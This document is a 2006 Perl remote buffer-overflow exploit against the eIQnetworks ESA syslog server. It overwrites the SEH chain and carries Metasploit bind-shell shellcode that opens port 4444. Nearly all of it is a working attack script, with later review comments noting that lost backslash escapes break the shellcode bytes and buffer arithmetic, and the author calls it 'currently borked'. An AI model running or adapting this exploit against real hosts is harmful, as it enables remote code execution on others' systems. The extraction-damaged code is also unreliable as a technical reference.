
# Title : eIQnetworks ESA (Syslog Server) Remote Buffer Overflow Exploit
# Published : 2006-07-27
# Author : Kevin Finisterre


#!/usr/bin/perl -w
# 
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006
# Bug found by KF of digitalmunition.com.
#
# http://www.zerodayinitiative.com/advisories/ZDI-06-023.html
#
# Exploit for * Syslog Server by eiQnetworks  (OEM for Several vendors)
#
# There MUST be a syslog service listening on port 12345 for this to work. The syslog service is not enabled by default.
#
# Currently borked... This shit overwrites the SEH on XP SP1. It just needs good shellcode. Perhaps a reverse style jmp instead of a 
# forward jump. This would eliminate the need for 2 stages of shellcode.
#
#SEH chain of thread 00000FF4
#Address    SE handler
#013ECEF8   FWASyslo.00449EDB
#013EFF78   WS2HELP.71AA15CF   <-------- I set this address. 
#
#013EFF74   90909090
#013EFF78   909032EB  Pointer to next SEH record  <--- I set this. 
#013EFF7C   71AA15CF  SE handler   <--- pop pop ret 
#013EFF80   90909090
#
#71AA15CF   5F               POP EDI
#71AA15D0   5D               POP EBP
#71AA15D1   C2 0800          RETN 8
#
# View the SEH Chain and set a break on the address of the JMP code. This will let you debug the stage one shellcode.
#
use IO::Socket;

# Size of the single write sent to the service; the $buf assembly below pads up to it.
$bufsize = 4096; 

# Default host; replaced by the second command-line argument in the @ARGV
# assignment below, so this value is only used when no host is given.
$hostname = "127.0.0.1";
# The two values placed into the SEH record on the target's stack.
# "l" packs a native-endian 32-bit integer, "V" a little-endian one.
# NOTE(review): the header's SEH-chain dump (71AA15CF) does not match the
# handler address used here (0x71abe325); the dump presumably predates it.
$nextserec = pack("l", (0xEB069090)); # jmp short +0x06
$sehandler = pack("V", (0x71abe325)); # pop edi, pop ebp, retn - ws2help.dll  (sent byte-reversed; note the 'V')

# Binary hunts performed by JxT and Titon
# Target table, keyed by the <target> argument: "<binary>:<offset to the SEH overwrite>".
# Both the usage listing and the lookup below split this on ':'.
$tgts{"0"} = "G2SRv4.0.36.exe:932"; # Use length to SEH overwrite. 

# Argument handling. The comma operator makes the unless() test the value of
# $hostname after the list assignment, so the usage block runs (and exits 1)
# whenever fewer than two arguments were given. $target is not checked
# against %tgts here; an unknown key falls through to the lookup below.
unless (($target,$hostname) = @ARGV,$hostname) {

        # NOTE(review): the leading/trailing "n" and "t" in these literals are
        # plain letters as extracted, and "$an" interpolates an (undefined)
        # variable $an rather than $a followed by a newline. This looks like
        # escape prefixes dropped in extraction; as written, the usage text
        # prints without line breaks and the per-target line is mostly empty.
        print "n        Syslog by eiQnetworks exploit, kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006n";
        print "nnUsage: $0 <target> <host>nnTargets:nn";

        # Uses the package globals $a/$b as scratch for the split; they are
        # unrelated to sort()'s use of them on the same line.
        foreach $key (sort(keys %tgts)) {
                ($a,$b) = split(/:/,$tgts{"$key"});
                print "t$key . $an";
        }

        print "n";
        exit 1;
}


# Resolve the selected target: $a = binary name, $b = offset to the SEH
# overwrite (used as the length of the first padding run below). An unknown
# $target leaves both undefined, with -w warnings here and in the arithmetic.
($a,$b) = split(/:/,$tgts{"$target"});
# "$bn" interpolates an undefined $bn, not $b -- same dropped-escape issue as the usage text.
print "*** Target: $a, Len: $bn";

# Stage 2 shellcode can be up to Length of SEH overwrite. 
# NOTE(review): as extracted, every "xNN" token below is three literal
# characters, not one byte. There are 344 tokens (matching the Size=344 note),
# so length($sc2) is 1032 as written -- larger than the 932 offset in %tgts,
# which the "$b - length($sc2)" padding arithmetic below does not expect.
$sc2 = 
# win32_bind -  EXITFUNC=seh LPORT=4444 
# Size=344 Encoder=PexFnstenvSub http://metasploit.com
"x2bxc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xb2".
"xfaxa1x2cx83xebxfcxe2xf4x4ex90x4ax61x5ax03x5exd3".
"x4dx9ax2ax40x96xdex2ax69x8ex71xddx29xcaxfbx4exa7".
"xfdxe2x2ax73x92xfbx4ax65x39xcex2ax2dx5cxcbx61xb5".
"x1ex7ex61x58xb5x3bx6bx21xb3x38x4axd8x89xaex85x04".
"xc7x1fx2ax73x96xfbx4ax4ax39xf6xeaxa7xedxe6xa0xc7".
"xb1xd6x2axa5xdexdexbdx4dx71xcbx7ax48x39xb9x91xa7".
"xf2xf6x2ax5cxaex57x2ax6cxbaxa4xc9xa2xfcxf4x4dx7c".
"x4dx2cxc7x7fxd4x92x92x1exdax8dxd2x1exedxaex5exfc".
"xdax31x4cxd0x89xaax5exfaxedx73x44x4ax33x17xa9x2e".
"xe7x90xa3xd3x62x92x78x25x47x57xf6xd3x64xa9xf2x7f".
"xe1xa9xe2x7fxf1xa9x5exfcxd4x92xb0x70xd4xa9x28xcd".
"x27x92x05x36xc2x3dxf6xd3x64x90xb1x7dxe7x05x71x44".
"x16x57x8fxc5xe5x05x77x7fxe7x05x71x44x57xb3x27x65".
"xe5x05x77x7cxe6xaexf4xd3x62x69xc9xcbxcbx3cxd8x7b".
"x4dx2cxf4xd3x62x9cxcbx48xd4x92xc2x41x3bx1fxcbx7c".
"xebxd3x6dxa5x55x90xe5xa5x50xcbx61xdfx18x04xe3x01".
"x4cxb8x8dxbfx3fx80x99x87x19x51xc9x5ex4cx49xb7xd3".
"xc7xbex5exfaxe9xadxf3x7dxe3xabxcbx2dxe3xabxf4x7d".
"x4dx2axc9x81x6bxffx6fx7fx4dx2cxcbxd3x4dxcdx5exfc".
"x39xadx5dxafx76x9ex5exfaxe0x05x71x44x42x70xa5x73".
"xe1x05x77xd3x62xfaxa1x2c";

# Stage 1 shellcode can only be 128 bytes. 
# 12 byte Nop find code by skylined?  This is bullshit right now... it does not hunt for the right shit. 
# Same extraction caveat as $sc2: 12 "xNN" tokens give 36 characters of text here, not 12 bytes.
$sc1 = "x5fx54x90xb8x90x90xfcx90xafxf2xc3x57";

# for XP SP1  
#  <nops> <stage 2 shellcode><jmp code> <pop pop ret> <nops> <128 byte or less stage 1 shellcode> 

# Should total 4096
# Left to right (see the layout comment above): padding up to the SEH record,
# $sc2, the next-SEH pointer and handler (the "8" in the last term is these two
# 4-byte values), a 128-character slot holding $sc1 padded with "x90", then
# "x58" filler for the remainder of $bufsize.
# NOTE(review): with the literal "x90"/"x58" strings as extracted, each repeat
# unit is 3 characters and length($sc2) exceeds $b, so the first repeat count
# is negative (Perl yields an empty string) and the total is not the 4096 the
# comment above promises; the arithmetic assumes single-byte units.
$buf = "x90" x ($b - length($sc2)) . $sc2 . $nextserec  . $sehandler . "x90" x (128 - length($sc1)) . $sc1 . "x58" x ($bufsize-$b-8-128);  

# "$hostnamen" interpolates an undefined $hostnamen, not $hostname -- dropped-escape issue again.
print "Exploiting $hostnamen";

# One TCP connection to the service on port 12345, which the header notes is not
# enabled by default. From the receiving side this is a single large write
# immediately after connect, followed by close.
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$hostname, PeerPort=>12345, Type=>SOCK_STREAM);

$sock or die "no socket :$!n"; 

# The whole buffer in one print; neither the print nor the close is checked for errors.
print $sock "$buf";
close $sock;
